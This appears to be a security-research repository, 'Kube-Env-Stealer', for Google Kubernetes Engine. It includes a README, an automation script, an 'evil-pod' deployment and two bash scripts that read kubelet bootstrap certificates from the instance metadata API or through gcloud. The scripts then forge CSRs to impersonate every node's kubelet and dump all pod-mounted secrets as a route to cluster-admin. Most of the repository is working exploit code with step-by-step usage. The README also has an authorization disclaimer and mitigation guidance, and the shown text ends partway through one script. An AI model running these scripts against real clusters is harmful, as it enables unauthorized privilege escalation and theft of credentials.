├── .gitignore
├── README.md
├── auto-exploit.sh
├── compute.instances.get
│   └── gce-gke-kubelet-csr-secret-extractor.sh
├── evil-pod.yaml
└── gke-kubelet-csr-secret-extractor.sh
/.gitignore:
--------------------------------------------------------------------------------
1 | *.swp
2 | cluster.tar
3 | 
4 | 
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Kube-Env-Stealer
2 | 
3 | ## TL;DR
4 | 
5 | If you can run a pod in GKE and the cluster isn't running [Metadata Concealment](https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata) or the newer implementation of [Workload Identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity), you have a really good chance at becoming `cluster-admin` in under a minute.
6 | 
7 | Also, this can be done with just `compute.instances.get` and network access to that cluster's Kubernetes API server. See the variant in the `compute.instances.get` folder of this repo.
8 | 
9 | DISCLAIMER: Only perform this on clusters you own and operate or are authorized to assess. This code is presented "as-is" without warranty or fitness for a particular purpose. Read the code and understand what it's doing before using.
10 | 
11 | Steps for the in-GKE approach:
12 | 
13 | - Clone this repo.
14 | - Thoroughly read the code and understand what it's doing first.
15 | - Have a working and configured `kubectl` pointed at the desired GKE cluster.
16 | - Ensure you have permissions to create a basic nginx pod.
17 | - Run `./auto-exploit.sh`
18 | - After 15-30 seconds, examine the contents of `cluster.tar`.
19 | - Leverage the service account token JWTs for service accounts with higher permissions via kubectl.
20 | 
21 | Steps for the outside-of-GKE approach:
22 | 
23 | - Clone this repo.
24 | - Thoroughly read the code and understand what it's doing first.
25 | - Have `gcloud curl jq awk sed grep base64 openssl kubectl` installed locally (no kubeconfig needed).
26 | - Use gcloud to obtain a GKE worker node instance name, project, and zone/region. You typically need `compute.instances.list` for this.
27 | - Ensure you can reach the Kubernetes API server of the cluster in that project at layer 4 (no credentials needed).
28 | - `cd compute.instances.get`
29 | - Run `./gce-gke-kubelet-csr-secret-extractor.sh`
30 | - After 15-30 seconds, examine the contents of the current directory.
31 | - Leverage the service account token JWTs for service accounts with higher permissions via `kubectl --token`.
32 | 
33 | ## Background
34 | 
35 | GKE clusters that expose the `kube-env` instance attribute via the metadata API URL are vulnerable to mass kubelet impersonation and cluster-wide secret extraction. In most cases, this will expose enough information to escalate privileges within the cluster to "cluster-admin" via service account tokens, stored within secrets, that carry those permissions. Or, it may provide just enough permissions to run pods that mount the host filesystem and allow "escaping" to the underlying host.
36 | 
37 | Accessing the `kube-env` file can occur via the UI/gcloud if the user has "compute.instances.get" IAM permissions, or if the metadata API is not blocked from being accessed by pods. In practice, this is commonly accessible to many users in a GCP Project who aren't meant to be cluster "admins".
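
As a concrete illustration of that gcloud/IAM path, the `compute.instances.get` variant in this repo reads `kube-env` roughly as follows; the project, zone, and instance names here are placeholders:

```bash
# Placeholder project/zone/instance names -- substitute values from your own environment.
gcloud compute instances describe gke-mycluster-default-pool-0c4e5f17-7rnv \
  --project my-gke-project --zone us-central1-a --format=json \
  | jq -r '.metadata.items[] | select(.key=="kube-env") | .value' \
  | grep -E '^(KUBELET_CERT|KUBELET_KEY|CA_CERT|KUBERNETES_MASTER_NAME)'
```

The interesting values are the kubelet bootstrap certificate and key, the cluster CA, and the API server name.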
38 | 
39 | Accessing the `kube-env` attributes attached to the GCE instances acting as GKE worker nodes via curl from inside a running pod:
40 | 
41 | ```bash
42 | curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env
43 | ```
44 | 
45 | If you see the contents of a largish file with key/value pairs, you're all set. If you receive a message that this endpoint has been concealed, the GKE Metadata Proxy is doing its job.
46 | 
47 | The kubelet has certain special permissions needed to do its job. It can get/list all pods in all namespaces, and it can get a secret if it knows the exact name and if the secret is attached to a pod running on itself. Compromising one kubelet's credentials means a partial secret compromise. But, if all kubelets are compromised, every secret currently in use by any pod is exposed.
48 | 
49 | The contents of `kube-env` include, among other things, the "bootstrap" certs needed for the kubelet to generate a keypair for the node. The permissions granted to these bootstrap certs allow the holder to submit a Certificate Signing Request (CSR) to the API Server and download/use the auto-approved certificates. So, with a little work, we can gain a valid set of certificates as that kubelet. The problem is, the secrets we are looking for might be attached to a pod on another node, and our kubelet will get a 403 Forbidden when trying to get their contents, as kubelets can only "see" secrets for pods scheduled on themselves. So, if we can impersonate every kubelet in the cluster, we can iterate through and extract the secrets each kubelet can see.
50 | 
51 | This is possible because: 1) the bootstrap `kube-env` certs are available without authentication via the metadata URL, and 2) the `kube-env` certs allow one to generate a CSR for any hostname. Thus, simply knowing all the hostnames of the nodes in the cluster is sufficient to be able to generate a second, valid kubelet keypair for each node if we have one node's bootstrap certificates. As a nice bonus, the generation of a new keypair doesn't invalidate the keypair that the kubelet is using, so this process is non-disruptive.
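
To make the CSR step concrete, here is a minimal sketch of what the scripts in this repo do per node (they actually generate a per-node `openssl.cnf`; the `-subj` form and the node name below are just illustrative):

```bash
NODE="gke-mycluster-default-pool-0c4e5f17-7rnv"   # placeholder node/instance name
# A fresh EC key plus a CSR whose subject claims that node's kubelet identity.
openssl ecparam -genkey -name prime256v1 -out "${NODE}.key"
openssl req -new -key "${NODE}.key" \
  -subj "/O=system:nodes/CN=system:node:${NODE}" -out "${NODE}.csr"
# Wrapped in a Kubernetes CertificateSigningRequest and submitted with the bootstrap
# certs, this is auto-approved and comes back as a client cert for that kubelet.
```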
52 | 
53 | ## High-level Attack Steps
54 | 
55 | Assuming we have the ability to run a pod on a GKE node not running [Metadata Concealment](https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata) or [Workload Identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity), we can run a script inside a pod of our choosing that performs the following steps:
56 | 
57 | - Verify we have the proper binaries used by this script
58 | - Download the `kube-env` from the metadata API URL
59 | - Source `kube-env` vars into our shell
60 | - Extract the bootstrap certificates from `kube-env` vars
61 | - Download the latest kubectl binary
62 | - Obtain the hostname of the current node (needed for the CSR)
63 | - Impersonate the local kubelet
64 | - Generate an openssl.cnf with this hostname inside
65 | - Generate a CSR file for this hostname
66 | - Generate a YAML object containing this CSR ready for
67 |   submission to K8s for signing/approving
68 | - Submit the CSR YAML and retrieve the valid kubelet certificate
69 |   for this hostname
70 | - Extract all the secrets that the kubelet can see for that
71 |   hostname/node
72 | - Grab a full JSON listing of all Pod specs in all namespaces
73 | - Use the current kubelet's permissions to get the list of
74 |   nodes in the cluster by name
75 | - Loop through all other nodes, impersonate each kubelet, and
76 |   extract all the secrets each kubelet can access.
77 | - Grab a concise listing of namespace, pod name, and secret name
78 |   to make using the secret contents easier.
79 | - Configure kubectl to use a ServiceAccount `token` JWT by passing in `--token eyJ...` to `kubectl` commands.
80 | 
81 | ## Troubleshooting
82 | 
83 | 1. If you or the script are unable to reach the `kube-env` endpoint on the Metadata API because the "endpoint has been concealed", your only option is to try modifying `evil-pod.yaml` to add `hostNetwork: true` so that the pod runs on the underlying node's network and bypasses the Metadata Proxy.
84 | 
85 | ## Cleanup
86 | 
87 | If you have `cluster-admin` permissions, you can _carefully_ list and delete the extra CSRs via kubectl. You can tell which ones to delete based on the date of creation. This is likely the only activity that is potentially dangerous to your cluster. It's also fine to leave them in place.
88 | 
89 | ## References
90 | 
91 | Coincidentally, this "exploit" script was being worked on _the same week_ that [https://www.4armed.com/blog/hacking-kubelet-on-gke/](https://www.4armed.com/blog/hacking-kubelet-on-gke/) published this great write-up (right before KubeCon 2018 NA), unbeknownst to me. That said, I didn't want to release it immediately, to allow for better GKE defaults/options to become available. Now that Workload Identity is available (it deprecates/incorporates the Metadata Concealment Proxy) and several months have passed, the prevention mechanisms are readily available.
92 | 
93 | To see more about real-world attacks that leveraged the metadata to escalate privileges inside a GKE cluster, watch [Shopify’s $25k Bug Report, and the Cluster Takeover That Didn’t Happen - Greg Castle and Shane Lawrence](https://www.youtube.com/watch?v=2XCm7vveU5A).
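
For defenders, here is a rough sketch of enabling those prevention mechanisms on an existing cluster; the cluster, node pool, project, and zone names are placeholders, and you should confirm the exact flags against the current gcloud documentation:

```bash
# Enable Workload Identity on the cluster (placeholder names throughout).
gcloud container clusters update my-cluster --zone us-central1-a \
  --workload-pool=my-gke-project.svc.id.goog

# Move each node pool to the GKE metadata server, which conceals kube-env from pods.
gcloud container node-pools update default-pool --cluster my-cluster \
  --zone us-central1-a --workload-metadata=GKE_METADATA
```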
94 | 
--------------------------------------------------------------------------------
/auto-exploit.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | kubectl create -f evil-pod.yaml
4 | kubectl wait deployment/evil-pod --timeout=60s --for condition=available
5 | PODNAME=$(kubectl get pods -l run=evil -o=jsonpath='{.items[*].metadata.name}')
6 | kubectl cp gke-kubelet-csr-secret-extractor.sh $PODNAME:/root
7 | kubectl exec -it $PODNAME -- chmod +x /root/gke-kubelet-csr-secret-extractor.sh
8 | kubectl exec -it $PODNAME -- apt-get update
9 | kubectl exec -it $PODNAME -- apt-get install curl -y
10 | kubectl exec -it $PODNAME -- /bin/bash -c "cd /root; ./gke-kubelet-csr-secret-extractor.sh"
11 | kubectl exec -it $PODNAME -- /bin/bash -c "cd /root; tar -cf cluster.tar dumps secrets"
12 | if [[ ! -f cluster.tar ]]; then
13 |   kubectl cp $PODNAME:/root/cluster.tar cluster.tar
14 |   tar -tvf cluster.tar
15 | else
16 |   echo "Local cluster.tar exists. Showing existing file"
17 |   tar -tvf cluster.tar
18 | fi
19 | kubectl delete -f evil-pod.yaml
20 | 
--------------------------------------------------------------------------------
/compute.instances.get/gce-gke-kubelet-csr-secret-extractor.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | 
3 | export KUBECONFIG="file" # Never fall back to a real local kubeconfig; every kubectl call below passes explicit connection flags
4 | # Global vars
5 | BINARIES="gcloud curl jq awk sed grep base64 openssl kubectl"
6 | KUBE_ENV_URL="http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env"
7 | KUBE_ENV_FILE="kube-env"
8 | CA_CERT_PEM="ca.crt"
9 | KUBELET_BOOTSTRAP_CERT="kubelet-bootstrap.crt"
10 | KUBELET_BOOTSTRAP_KEY="kubelet-bootstrap.key"
11 | KUBE_HOSTNAME_URL="http://169.254.169.254/computeMetadata/v1/instance/hostname"
12 | CURRENT_HOSTNAME=""
13 | hexchars="0123456789ABCDEF"
14 | SUFFIX="$( for i in {1..4} ; do echo -n ${hexchars:$(( $RANDOM % 16 )):1} ; done )"
15 | OPENSSL_CNF="openssl.cnf"
16 | KUBELET_EC_KEY="kubelet.key"
17 | KUBELET_EC_CERT="kubelet.crt"
18 | KUBELET_CSR="kubelet.csr"
19 | KUBELET_CSR_YAML="kubelet-csr.yaml"
20 | ALL_NODE_NAMES=""
21 | NS_POD_SECRETS="ns-pod-secret-listing.txt"
22 | 
23 | # Functions
24 | function print-status {
25 |   echo "[[ ${@} ]]"
26 | }
27 | 
28 | function check-binaries {
29 |   # Ensure we have the needed binaries
30 |   for binary in ${BINARIES}; do
31 |     print-status "Checking if ${binary} exists"
32 |     which ${binary} 2> /dev/null 1> /dev/null
33 |     if [[ $? -ne 0 ]]; then
34 |       echo "ERROR: Script requires ${binary}, but it was not found in the path. Aborting."
35 |       exit 1
36 |     fi
37 |   done
38 | }
39 | 
40 | function get-kube-env {
41 |   # Obtain the kube-env via the GCE API (gcloud)
42 |   print-status "Obtain kube-env"
43 |   # Only requires (compute.instances.list) or (compute.instances.get and knowledge of one GKE worker host name) in a project with a GKE cluster. roles/viewer is sufficient!
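  # The pipeline below pulls the instance metadata as JSON, uses jq to select the kube-env
  # attribute, keeps only the KUBELET_CERT/KUBELET_KEY/CA_CERT/KUBERNETES_MASTER_NAME entries,
  # and rewrites "KEY: value" into "KEY=value" so the result can be sourced as shell variables.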
44 |   gcloud compute instances describe --project "${1}" --zone "${3}" "${2}" --format=json | jq -r ".metadata.items[] | select(.key==\"kube-env\") | .value" | grep "^KUBELET_CERT:\|^KUBELET_KEY:\|^CA_CERT:\|^KUBERNETES_MASTER_NAME" | sed -e 's/: /=/g' > "${KUBE_ENV_FILE}"
45 |   CURRENT_HOSTNAME="${2}" # The GCE instance name is also the Kubernetes node name
46 | }
47 | 
48 | function source-kube-env {
49 |   print-status "Source kube-env"
50 |   source "${KUBE_ENV_FILE}"
51 |   rm -f "${KUBE_ENV_FILE}"
52 | }
53 | 
54 | function get-bootstrap-certs {
55 |   # Write the public CA cert, kubelet-bootstrap cert, and kubelet-bootstrap.key
56 |   print-status "Get bootstrap certificate data"
57 |   if [[ ! -d bootstrap ]]; then
58 |     mkdir -p bootstrap
59 |   fi
60 |   if [[ "$(uname -s)" == 'Darwin' ]]; then
61 |     echo "${CA_CERT}" | base64 -D > "bootstrap/${CA_CERT_PEM}"
62 |     echo "${KUBELET_CERT}" | base64 -D > "bootstrap/${KUBELET_BOOTSTRAP_CERT}"
63 |     echo "${KUBELET_KEY}" | base64 -D > "bootstrap/${KUBELET_BOOTSTRAP_KEY}"
64 |   else
65 |     echo "${CA_CERT}" | base64 -d > "bootstrap/${CA_CERT_PEM}"
66 |     echo "${KUBELET_CERT}" | base64 -d > "bootstrap/${KUBELET_BOOTSTRAP_CERT}"
67 |     echo "${KUBELET_KEY}" | base64 -d > "bootstrap/${KUBELET_BOOTSTRAP_KEY}"
68 |   fi
69 | }
70 | 
71 | function generate-openssl-cnf {
72 |   # Generate a host-specific openssl.cnf for use with the CSR generation
73 |   print-status "Create nodes/${1}/${OPENSSL_CNF}"
74 |   cat << EOF > "nodes/${1}/${OPENSSL_CNF}"
75 | [ req ]
76 | prompt = no
77 | encrypt_key = no
78 | default_md = sha256
79 | distinguished_name = dname
80 | 
81 | [ dname ]
82 | O = system:nodes
83 | CN = system:node:${1}
84 | EOF
85 | }
86 | 
87 | function generate-ec-keypair {
88 |   # Generate a per-host EC keypair
89 |   print-status "Generate EC kubelet keypair for ${1}"
90 |   if [ ! -f "nodes/${1}/${KUBELET_EC_KEY}" ]; then
91 |     openssl ecparam -genkey -name prime256v1 -out "nodes/${1}/${KUBELET_EC_KEY}"
92 |   fi
93 | }
94 | 
95 | function generate-csr {
96 |   # Generate the CSR using the per-host openssl.cnf and EC keypair
97 |   print-status "Generate CSR for ${1}"
98 |   if [ ! -f "nodes/${1}/${KUBELET_CSR}" ]; then
-f "nodes/${1}/${KUBELET_CSR}" ]; then 99 | openssl req -new -config "nodes/${1}/${OPENSSL_CNF}" -key "nodes/${1}/${KUBELET_EC_KEY}" -out "nodes/${1}/${KUBELET_CSR}" 100 | fi 101 | } 102 | 103 | function generate-csr-yaml { 104 | # Prepare the CSR object for submission to K8s 105 | print-status "Generate CSR YAML for ${1}" 106 | cat < "nodes/${1}/${KUBELET_CSR_YAML}" 107 | apiVersion: certificates.k8s.io/v1beta1 108 | kind: CertificateSigningRequest 109 | metadata: 110 | name: node-csr-${1}-${SUFFIX} 111 | spec: 112 | groups: 113 | - system:authenticated 114 | request: $(cat nodes/${1}/${KUBELET_CSR} | base64 | tr -d '\n') 115 | usages: 116 | - digital signature 117 | - key encipherment 118 | - client auth 119 | username: kubelet 120 | EOF 121 | } 122 | 123 | function generate-certificate { 124 | # Submit the CSR object, wait a second, and then fetch the signed/approved certificate file 125 | print-status "Submit CSR and Generate Certificate for ${1}" 126 | kubectl create -f "nodes/${1}/${KUBELET_CSR_YAML}" --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="bootstrap/${KUBELET_BOOTSTRAP_CERT}" --client-key="bootstrap/${KUBELET_BOOTSTRAP_KEY}" 127 | 128 | print-status "Sleep 2 while being approved" 129 | sleep 2 130 | 131 | print-status "Download approved Cert for ${1}" 132 | if [[ "$(uname -s)" -eq 'Darwin' ]]; then 133 | kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="bootstrap/${KUBELET_BOOTSTRAP_CERT}" --client-key="bootstrap/${KUBELET_BOOTSTRAP_KEY}" get csr "node-csr-${1}-${SUFFIX}" -o jsonpath='{.status.certificate}' | base64 -D > "nodes/${1}/${KUBELET_EC_CERT}" 134 | else 135 | kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="bootstrap/${KUBELET_BOOTSTRAP_CERT}" --client-key="bootstrap/${KUBELET_BOOTSTRAP_KEY}" get csr "node-csr-${1}-${SUFFIX}" -o jsonpath='{.status.certificate}' | base64 -d > "nodes/${1}/${KUBELET_EC_CERT}" 136 | fi 137 | } 138 | 139 | function dump-secrets { 140 | # Use the kubelet's permissions to dump the secrets it can access 141 | print-status "Dumping secrets mounted to ${1} into the 'secrets/' folder" 142 | if [[ ! -d secrets ]]; then 143 | mkdir -p secrets 144 | fi 145 | for i in $(kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" get pods --all-namespaces -o=jsonpath='{range .items[*]}{.metadata.namespace}{"|"}{.spec.volumes[*].secret.secretName}{"\n"}{end}' | sort -u); do 146 | NS=$(echo $i | awk -F\| '{print $1}') 147 | SECRET=$(echo $i | awk -F\| '{print $2}') 148 | if [[ ! -z "${SECRET}" ]]; then 149 | kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" -n "${NS}" get secret "${SECRET}" 2> /dev/null 1> /dev/null 150 | if [[ $? 
151 |         echo "Exporting secrets/${NS}-${SECRET}.json"
152 |         kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" -n "${NS}" get secret "${SECRET}" -o=json > "secrets/${NS}-${SECRET}.json"
153 |       fi
154 |     fi
155 |   done
156 | }
157 | 
158 | function get-pods-list {
159 |   # Fetches a full pod listing to know which secrets are tied to which pods
160 |   print-status "Download a full pod listing"
161 |   kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" get pods --all-namespaces -o json > dumps/allpods.json
162 | }
163 | 
164 | function get-nodes-list {
165 |   # Fetch the listing of nodes in the cluster from K8s
166 |   print-status "Get node names"
167 |   ALL_NODE_NAMES="$(kubectl --server=https://${KUBERNETES_MASTER_NAME} --certificate-authority=bootstrap/${CA_CERT_PEM} --client-certificate=nodes/${1}/${KUBELET_EC_CERT} --client-key=nodes/${1}/${KUBELET_EC_KEY} get nodes -o=jsonpath='{.items[*].metadata.name}')"
168 | }
169 | 
170 | function impersonate-kubelet {
171 |   # All the steps to get per-node credentials and dump the secrets it can access
172 |   if [[ ! -d nodes/${1} ]]; then
173 |     mkdir -p nodes/${1}
174 |   fi
175 |   if [[ ! -d dumps ]]; then
176 |     mkdir -p dumps
177 |   fi
178 |   generate-openssl-cnf "${1}"
179 |   generate-ec-keypair "${1}"
180 |   generate-csr "${1}"
181 |   generate-csr-yaml "${1}"
182 |   generate-certificate "${1}"
183 |   dump-secrets "${1}"
184 | }
185 | 
186 | function iterate-through-nodes {
187 |   # Find and iterate through all the other nodes in the cluster
188 |   print-status "Iterate through all other node names"
189 |   for i in ${ALL_NODE_NAMES}; do
190 |     if [[ "${i}" != "${1}" ]]; then
191 |       impersonate-kubelet "${i}"
192 |     fi
193 |   done
194 | }
195 | 
196 | function print-ns-pod-secrets {
197 |   # Extracts and prints namespace, podname, and secret
198 |   print-status "Extracting namespace, podname, and secret listing to the 'dumps/' folder"
199 |   kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" get pods --all-namespaces -o=jsonpath='{range .items[*]}{.metadata.namespace}{"|"}{.metadata.name}{"|"}{.spec.volumes[*].secret.secretName}{"\n"}{end}' | sort -u > "dumps/${NS_POD_SECRETS}"
200 | }
201 | 
202 | # usage
203 | if [ $# -ne 3 ]; then
204 |   echo 1>&2 "Usage: $0 project-name gke-gce-instance-name zone-name"
205 |   echo 1>&2 "e.g: $0 my-gke-project gke-clustername-nodepoolname-0c4e5f17-7rnv us-central1-a"
206 |   echo 1>&2 ""
207 |   echo 1>&2 "Note: Your gcloud must be authenticated to the correct project with 'compute.instances.get' permissions"
208 |   exit 3
209 | fi
210 | # Logic begins here
211 | check-binaries
212 | get-kube-env "${1}" "${2}" "${3}"
213 | source-kube-env
214 | get-bootstrap-certs
215 | impersonate-kubelet "${CURRENT_HOSTNAME}"
216 | get-pods-list "${CURRENT_HOSTNAME}"
217 | get-nodes-list "${CURRENT_HOSTNAME}"
218 | iterate-through-nodes "${CURRENT_HOSTNAME}"
219 | print-ns-pod-secrets "${CURRENT_HOSTNAME}"
220 | 
--------------------------------------------------------------------------------
/evil-pod.yaml:
--------------------------------------------------------------------------------
1 | apiVersion: apps/v1
2 | kind: Deployment
3 | metadata:
4 |   name: evil-pod
5 | spec:
6 |   replicas: 1
7 |   selector:
8 |     matchLabels:
9 |       run: evil
10 |   template:
11 |     metadata:
12 |       labels:
13 |         run: evil
14 |     spec:
15 |       # If metadata proxy is running and you have no PSP
16 |       # preventing this setting, uncomment to run on the
17 |       # underlying node's network namespace to bypass it.
18 |       # hostNetwork: true
19 |       containers:
20 |       - name: evil-pod
21 |         image: nginx:latest
22 | 
--------------------------------------------------------------------------------
/gke-kubelet-csr-secret-extractor.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | 
3 | # Global vars
4 | BINARIES="curl awk sed grep base64 openssl"
5 | KUBE_ENV_URL="http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env"
6 | KUBE_ENV_FILE="kube-env"
7 | CA_CERT_PEM="ca.crt"
8 | KUBELET_BOOTSTRAP_CERT="kubelet-bootstrap.crt"
9 | KUBELET_BOOTSTRAP_KEY="kubelet-bootstrap.key"
10 | KUBE_HOSTNAME_URL="http://169.254.169.254/computeMetadata/v1/instance/hostname"
11 | CURRENT_HOSTNAME=""
12 | hexchars="0123456789ABCDEF"
13 | SUFFIX="$( for i in {1..4} ; do echo -n ${hexchars:$(( $RANDOM % 16 )):1} ; done )"
14 | OPENSSL_CNF="openssl.cnf"
15 | KUBELET_EC_KEY="kubelet.key"
16 | KUBELET_EC_CERT="kubelet.crt"
17 | KUBELET_CSR="kubelet.csr"
18 | KUBELET_CSR_YAML="kubelet-csr.yaml"
19 | ALL_NODE_NAMES=""
20 | NS_POD_SECRETS="ns-pod-secret-listing.txt"
21 | 
22 | # Functions
23 | function print-status {
24 |   echo "[[ ${@} ]]"
25 | }
26 | 
27 | function check-binaries {
28 |   # Ensure we have the needed binaries
29 |   for binary in ${BINARIES}; do
30 |     print-status "Checking if ${binary} exists"
31 |     which ${binary} 2> /dev/null 1> /dev/null
32 |     if [[ $? -ne 0 ]]; then
33 |       echo "ERROR: Script requires ${binary}, but it was not found in the path. Aborting."
34 |       exit 1
35 |     fi
36 |   done
37 | }
38 | 
39 | function get-kube-env {
40 |   # Obtain the kube-env via the metadata URL
41 |   print-status "Obtain kube-env"
42 |   if [ ! -f "${KUBE_ENV_FILE}" ]; then
43 |     # convert into bash formatted vars (three we don't need break formatting/escaping so we grep them out)
44 |     curl -s -H "Metadata-flavor: Google" "${KUBE_ENV_URL}" | grep -v "EVICTION" | grep -v "KUBELET_TEST_ARGS" | grep -v "EXTRA_DOCKER_OPTS" | sed -e 's/: /=/g' > "${KUBE_ENV_FILE}"
45 |   fi
46 | }
47 | 
48 | function source-kube-env {
49 |   print-status "Source kube-env"
50 |   source "${KUBE_ENV_FILE}"
51 | }
52 | 
53 | function get-bootstrap-certs {
54 |   # Write the public CA cert, kubelet-bootstrap cert, and kubelet-bootstrap.key
55 |   print-status "Get bootstrap certificate data"
56 |   if [[ ! -d bootstrap ]]; then
57 |     mkdir -p bootstrap
58 |   fi
59 |   echo "${CA_CERT}" | base64 -d > "bootstrap/${CA_CERT_PEM}"
60 |   echo "${KUBELET_CERT}" | base64 -d > "bootstrap/${KUBELET_BOOTSTRAP_CERT}"
61 |   echo "${KUBELET_KEY}" | base64 -d > "bootstrap/${KUBELET_BOOTSTRAP_KEY}"
62 | }
63 | 
64 | function get-hostname {
65 |   # Obtain the hostname via the metadata URL
66 |   print-status "Obtain the Hostname"
67 |   CURRENT_HOSTNAME="$(curl -s -H 'Metadata-flavor: Google' ${KUBE_HOSTNAME_URL} | awk -F. '{print $1}')"
68 | }
69 | 
70 | function get-kubectl {
71 |   # Fetch the latest kubectl binary if needed
72 |   print-status "Get kubectl binary"
73 |   if [ ! -f kubectl ]; then
74 |     curl -s -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl
75 |     chmod +x kubectl
76 |   fi
77 | }
78 | 
79 | function generate-openssl-cnf {
80 |   # Generate a host-specific openssl.cnf for use with the CSR generation
81 |   print-status "Create nodes/${1}/${OPENSSL_CNF}"
82 |   cat << EOF > "nodes/${1}/${OPENSSL_CNF}"
83 | [ req ]
84 | prompt = no
85 | encrypt_key = no
86 | default_md = sha256
87 | distinguished_name = dname
88 | 
89 | [ dname ]
90 | O = system:nodes
91 | CN = system:node:${1}
92 | EOF
93 | }
94 | 
95 | function generate-ec-keypair {
96 |   # Generate a per-host EC keypair
97 |   print-status "Generate EC kubelet keypair for ${1}"
98 |   if [ ! -f "nodes/${1}/${KUBELET_EC_KEY}" ]; then
99 |     openssl ecparam -genkey -name prime256v1 -out "nodes/${1}/${KUBELET_EC_KEY}"
100 |   fi
101 | }
102 | 
103 | function generate-csr {
104 |   # Generate the CSR using the per-host openssl.cnf and EC keypair
105 |   print-status "Generate CSR for ${1}"
106 |   if [ ! -f "nodes/${1}/${KUBELET_CSR}" ]; then
107 |     openssl req -new -config "nodes/${1}/${OPENSSL_CNF}" -key "nodes/${1}/${KUBELET_EC_KEY}" -out "nodes/${1}/${KUBELET_CSR}"
108 |   fi
109 | }
110 | 
111 | function generate-csr-yaml {
112 |   # Prepare the CSR object for submission to K8s
113 |   print-status "Generate CSR YAML for ${1}"
114 |   cat << EOF > "nodes/${1}/${KUBELET_CSR_YAML}"
115 | apiVersion: certificates.k8s.io/v1beta1
116 | kind: CertificateSigningRequest
117 | metadata:
118 |   name: node-csr-${1}-${SUFFIX}
119 | spec:
120 |   groups:
121 |   - system:authenticated
122 |   request: $(cat nodes/${1}/${KUBELET_CSR} | base64 | tr -d '\n')
123 |   usages:
124 |   - digital signature
125 |   - key encipherment
126 |   - client auth
127 |   username: kubelet
128 | EOF
129 | }
130 | 
131 | function generate-certificate {
132 |   # Submit the CSR object, wait a second, and then fetch the signed/approved certificate file
133 |   print-status "Submit CSR and Generate Certificate for ${1}"
134 |   ./kubectl create -f "nodes/${1}/${KUBELET_CSR_YAML}" --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="bootstrap/${KUBELET_BOOTSTRAP_CERT}" --client-key="bootstrap/${KUBELET_BOOTSTRAP_KEY}"
135 | 
136 |   print-status "Sleep 2 while being approved"
137 |   sleep 2
138 | 
139 |   print-status "Download approved Cert for ${1}"
140 |   ./kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="bootstrap/${KUBELET_BOOTSTRAP_CERT}" --client-key="bootstrap/${KUBELET_BOOTSTRAP_KEY}" get csr "node-csr-${1}-${SUFFIX}" -o jsonpath='{.status.certificate}' | base64 -d > "nodes/${1}/${KUBELET_EC_CERT}"
141 | 
142 | }
143 | 
144 | function dump-secrets {
145 |   # Use the kubelet's permissions to dump the secrets it can access
146 |   print-status "Dumping secrets mounted to ${1}"
147 |   if [[ ! -d secrets ]]; then
148 |     mkdir -p secrets
149 |   fi
150 |   for i in $(./kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" get pods --all-namespaces -o=jsonpath='{range .items[*]}{.metadata.namespace}{"|"}{.spec.volumes[*].secret.secretName}{"\n"}{end}' | sort -u); do
151 |     NS=$(echo $i | awk -F\| '{print $1}')
152 |     SECRET=$(echo $i | awk -F\| '{print $2}')
153 |     if [[ ! -z "${SECRET}" ]]; then
